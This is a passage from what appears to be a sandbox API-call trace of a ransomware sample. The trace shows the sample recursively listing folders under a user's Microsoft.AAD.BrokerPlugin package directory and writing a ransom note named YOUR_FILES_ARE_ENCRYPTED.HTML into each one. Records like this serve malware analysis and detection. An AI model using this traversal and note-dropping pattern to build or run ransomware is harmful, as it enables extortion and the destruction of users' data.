Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.430] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.aad.brokerplugin_cw5n1h2txyewy\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0114.430] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.431] CloseHandle (hObject=0x32c) returned 1 [0114.431] GetProcessHeap () returned 0x600000 [0114.431] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.431] GetProcessHeap () returned 0x600000 [0114.431] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.432] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x547df81c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x547df81c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x547df81c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName="Temp", cAlternateFileName="")) returned 0 [0114.432] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0114.432] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0114.432] GetProcessHeap () returned 0x600000 [0114.432] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.432] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.aad.brokerplugin_cw5n1h2txyewy\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0114.433] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.434] CloseHandle (hObject=0x324) returned 1 [0114.434] GetProcessHeap () returned 0x600000 [0114.434] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.434] GetProcessHeap () returned 0x600000 [0114.434] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.434] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x547933c2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x547933c2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x547933c2, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0114.434] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.434] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AppData") returned 97 [0114.434] GetProcessHeap () returned 0x600000 [0114.434] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.435] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AppData" [0114.435] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AppData\\*" [0114.435] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x547933c2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x547933c2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x547933c2, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0114.435] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x547933c2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x547933c2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x547933c2, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName="..", cAlternateFileName="")) returned 1 [0114.435] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x547933c2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x547933c2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x547933c2, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName="..", cAlternateFileName="")) returned 0 [0114.435] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0114.435] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0114.436] GetProcessHeap () returned 0x600000 [0114.436] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.436] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.aad.brokerplugin_cw5n1h2txyewy\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0114.436] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.437] CloseHandle (hObject=0x324) returned 1 [0114.437] GetProcessHeap () returned 0x600000 [0114.437] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.437] GetProcessHeap () returned 0x600000 [0114.437] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.438] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5476d1ac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5476d1ac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5476d1ac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0114.438] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.438] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\LocalCache") returned 100 [0114.438] GetProcessHeap () returned 0x600000 [0114.438] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.439] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\LocalCache" [0114.439] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\LocalCache\\*" [0114.439] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5476d1ac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5476d1ac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5476d1ac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0114.439] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5476d1ac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5476d1ac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5476d1ac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName="..", cAlternateFileName="")) returned 1 [0114.439] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5476d1ac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5476d1ac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5476d1ac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName="..", cAlternateFileName="")) returned 0 [0114.439] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0114.440] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0114.440] GetProcessHeap () returned 0x600000 [0114.440] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.441] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.aad.brokerplugin_cw5n1h2txyewy\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0114.441] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.442] CloseHandle (hObject=0x324) returned 1 [0114.442] GetProcessHeap () returned 0x600000 [0114.442] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.442] GetProcessHeap () returned 0x600000 [0114.442] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.443] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54746ebf, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x54746ebf, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x54746ebf, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0114.443] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.443] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\LocalState") returned 100 [0114.443] GetProcessHeap () returned 0x600000 [0114.443] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.444] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\LocalState" [0114.444] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\LocalState\\*" [0114.444] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54746ebf, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x54746ebf, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x54746ebf, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0114.444] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54746ebf, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x54746ebf, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x54746ebf, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName="..", cAlternateFileName="")) returned 1 [0114.444] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54746ebf, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x54746ebf, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x54746ebf, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName="..", cAlternateFileName="")) returned 0 [0114.444] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0114.444] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0114.444] GetProcessHeap () returned 0x600000 [0114.444] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.444] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.aad.brokerplugin_cw5n1h2txyewy\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0114.445] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.446] CloseHandle (hObject=0x324) returned 1 [0114.446] GetProcessHeap () returned 0x600000 [0114.446] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.446] GetProcessHeap () returned 0x600000 [0114.446] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.446] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x548ea798, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x548ea798, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x548ea798, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.AAD.BrokerPlugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy", cAlternateFileName="MICROS~1.0_N")) returned 1 [0114.446] StrStrIW (lpFirst="Microsoft.AAD.BrokerPlugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.446] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Microsoft.AAD.BrokerPlugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy") returned 161 [0114.446] GetProcessHeap () returned 0x600000 [0114.446] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.447] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Microsoft.AAD.BrokerPlugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Microsoft.AAD.BrokerPlugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Microsoft.AAD.BrokerPlugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy" [0114.447] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Microsoft.AAD.BrokerPlugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Microsoft.AAD.BrokerPlugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Microsoft.AAD.BrokerPlugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\*" [0114.447] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Microsoft.AAD.BrokerPlugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x548ea798, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x548ea798, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x548ea798, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0114.447] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x548ea798, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x548ea798, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x548ea798, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName="..", cAlternateFileName="")) returned 1 [0114.447] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x548ea798, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x548ea798, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x548ea798, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0114.447] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.447] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Microsoft.AAD.BrokerPlugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore") returned 177 [0114.448] GetProcessHeap () returned 0x600000 [0114.448] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0114.449] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Microsoft.AAD.BrokerPlugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Microsoft.AAD.BrokerPlugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Microsoft.AAD.BrokerPlugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore" [0114.449] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Microsoft.AAD.BrokerPlugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore", lpString2="\\*" | out: 